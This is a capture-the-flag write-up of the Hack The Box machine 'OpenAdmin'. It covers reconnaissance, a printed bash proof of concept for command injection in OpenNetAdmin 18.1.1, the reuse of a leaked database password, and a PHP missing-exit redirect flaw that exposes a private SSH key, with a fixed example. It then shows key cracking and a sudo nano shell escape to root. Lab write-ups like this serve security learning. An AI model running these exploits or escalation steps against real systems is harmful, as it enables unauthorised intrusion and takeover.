OpenAdmin is an easy difficulty box from Hack The Box that starts off by finding an instance of OpenNetAdmin. This application is known to be vulnerable to remote code execution, which can be leveraged to gain a foothold on the system and then obtain reused database credentials. The first user has access to a web resource that is currently hosted internally. The internal web application has a logic flaw that allows me to obtain the SSH key of the second user. The second user is allowed to run the nano editor with sudo privileges, which can be abused to gain root access.
Reconnaissance
I’ll start with port scanning using nmap
Nmap
nmap -sV -sC -oA OpenAdmin 10.10.10.171
- -sC, to run the default NSE scripts
- -sV, to detect service versions
- -oA OpenAdmin, to save the output in all three formats (.nmap, .gnmap and .xml) with the basename OpenAdmin
- -v, for verbose output during the scan (not used in the command above)
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
From the scan results, nmap found two open ports:
- An SSH service running on port 22
- An HTTP service running on port 80
Also from the scan above, the machine is likely running Ubuntu.
As SSH usually requires valid credentials and there is no straightforward exploit for it yet, further enumeration is needed.
Enumeration
TCP 80 — Website
Visiting port 80 only displays the default Apache page.
Directory Brute Force
Performing directory brute force on the web server using dirb discovered a few hidden web directories.
$ dirb http://openadmin.htb/ /usr/share/wordlists/dirb/common.txt -r
... <snip> ...
---- Scanning URL: http://openadmin.htb/ ----
==> DIRECTORY: http://openadmin.htb/artwork/
+ http://openadmin.htb/index.html (CODE:200|SIZE:10918)
==> DIRECTORY: http://openadmin.htb/music/
+ http://openadmin.htb/server-status (CODE:200|SIZE:278)
... <snip> ...
The /music home page provides a login menu that points to http://openadmin.htb/ona
Visiting /ona/ brings me to an instance of OpenNetAdmin, software for managing network-related resources.
There is a warning on the page complaining that the version currently in use (v18.1.1) is not the latest one.
Foothold
Exploit PoC for OpenNetAdmin 18.1.1
Based on the version above, a quick search on exploit-db shows that the current instance of OpenNetAdmin is vulnerable to remote code execution. The exploit PoC source code is as follows:
OpenRCE.sh
#!/bin/bash
URL="${1}"
while true; do
  echo -n "$ "; read cmd
  curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
The exploit PoC is saved as OpenRCE.sh and below is the command issued to run it.
./OpenRCE.sh http://openadmin.htb/ona/
Shell as jimmy
Upon enumerating the current working directory, database credentials are found in ./local/config/database_settings.inc.php.
$ cat /opt/ona/www/local/config/database_settings.inc.php
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
There are two regular users with home directories under /home.
$ cat /etc/passwd | grep sh$
root:x:0:0:root:/root:/bin/bash
jimmy:x:1000:1000:jimmy:/home/jimmy:/bin/bash
joanna:x:1001:1001:,,,:/home/joanna:/bin/bash
The password from the database config is reused by user jimmy, but the user flag cannot be found in jimmy's home directory.
The find command is issued to search for files owned by user jimmy.
find / -type f -user jimmy 2>/dev/null
It reveals that user jimmy owns files in /var/www/internal/.
Based on the Apache config, /var/www/internal is currently hosted locally on port 52846.
$ cat /etc/apache2/sites-enabled/internal.conf
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
Code review — Improper Redirection
After inspecting the main.php source code from /var/www/internal/, a logic flaw was found on the first line.
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); };
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>
This line of code has an improper redirection.
<?php session_start();
if (!isset ($_SESSION['username'])) {
header("Location: /index.php");
};
...<snip>...
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
...<snip>...
The code above checks the user's session, but the check is incomplete: the die() or exit() call after header() is missing, so the rest of the script is executed as well. Therefore, sending a plain request with curl (which does not follow redirects unless the -L option is given) ignores the redirect, and the response body still renders joanna's SSH key.
jimmy@openadmin:~$ curl -s http://127.0.0.1:52846/main.php
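The fix for the flaw above, as an added example rather than the file from the box: the redirect is followed by exit, so nothing after the session check runs for an unauthenticated request.

```php
<?php
// Added example, not the box's main.php: the same page with the redirect
// fixed. The original calls header() and keeps running, so the body
// (joanna's private key) is sent even when no session exists.
session_start();

if (!isset($_SESSION['username'])) {
    header('Location: /index.php', true, 302);
    exit; // header() only queues a response header; the script must stop here
}

// Only reached with a valid session. Kept from the original to show the
// ordering; the sensitive output below is now behind the check.
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo '<pre>' . htmlspecialchars((string) $output, ENT_QUOTES, 'UTF-8') . '</pre>';
?>
```

Against the fixed page, the same curl -s request without a session returns an empty body, and curl -s -I shows only the 302 with its Location header.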
Cracking SSH Password
The private key is encrypted with a password. JtR can be used to crack an encrypted SSH key, but first it must be converted to hash form, which is done with ssh2john.py
python ssh2john.py joanna_rsa > joanna_rsa.hash
Once the hash is copied to my Windows machine, cracking is attempted using John the Ripper.
Shell as joanna
I successfully logged in as user joanna via SSH using the cracked password.
ssh -i joanna_rsa joanna@10.10.10.171
User flag is done here.
Privilege Escalation
Abusing sudo nano
User joanna has sudo privileges on /bin/nano.
On Linux boxes, whenever you own a valid user password, always check sudo -l!
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
A quick way to read the root flag is by issuing the command below,
joanna@openadmin:~$ sudo /bin/nano /opt/priv
and then hit CTRL + R to open a file, which allows us to read the root flag /root/root.txt.
From the GTFOBins page, escalation from user joanna to a root shell is as follows:
joanna@openadmin:~$ sudo /bin/nano /opt/priv # Opening nano as root
^R^X # CTRL+R (read/open file), CTRL+X(execute command)
reset; sh 1>&0 2>&0 # Escape from nano